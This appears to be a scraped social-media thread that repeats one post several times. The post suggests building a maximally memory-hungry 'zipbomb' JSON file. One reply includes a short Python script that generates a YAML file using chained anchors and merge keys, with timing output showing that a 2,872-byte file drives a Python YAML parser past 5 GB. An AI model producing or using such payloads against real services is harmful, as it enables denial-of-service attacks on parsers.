Zipbomb JSON.
-
Zipbomb JSON.
Someone who is not me should formulate a maximally-malicious JSON file. I made one with a nesting depth of ~182 million, but "jq" gives up early, at only around depth 3,000. So one trick would be to find the right balance of nesting and array length that stays under typical parsers' limits as long as possible, while requiring as much RAM as possible to get there.
https://jwz.org/b/yk2x -
Zipbomb JSON.
Someone who is not me should formulate a maximally-malicious JSON file. I made one with a nesting depth of ~182 million, but "jq" gives up early, at only around depth 3,000. So one trick would be to find the right balance of nesting and array length that stays under typical parsers' limits as long as possible, while requiring as much RAM as possible to get there.
https://jwz.org/b/yk2x@jwz what formats support spare files?
-
Zipbomb JSON.
Someone who is not me should formulate a maximally-malicious JSON file. I made one with a nesting depth of ~182 million, but "jq" gives up early, at only around depth 3,000. So one trick would be to find the right balance of nesting and array length that stays under typical parsers' limits as long as possible, while requiring as much RAM as possible to get there.
https://jwz.org/b/yk2x@jwz yaml could be a good target for this too since it canonically supports references and ways to modify referenced data.
this python
print('a0: &t0')
print(' f0: v0')for x in range(33):
print(f'a{x+1}: &t{x+1}')
print(f' <<: *t{x}')
if x > 2:
print(f' <<: *t{x-1}')
print(f' f{x+1}: v{x+1} #override')
print(f' g{x+1}: w{x+1} #override')generates a yaml file that takes a while to load in python's yaml parser:
$ time python3 tl.py
real 0m31.946s
user 0m31.629s
sys 0m0.286s40 steps gets the python interpreter over 5 gig (i'm too lazy to run this to completion) using just 2872 bytes of input.
-
undefined oblomov@sociale.network shared this topic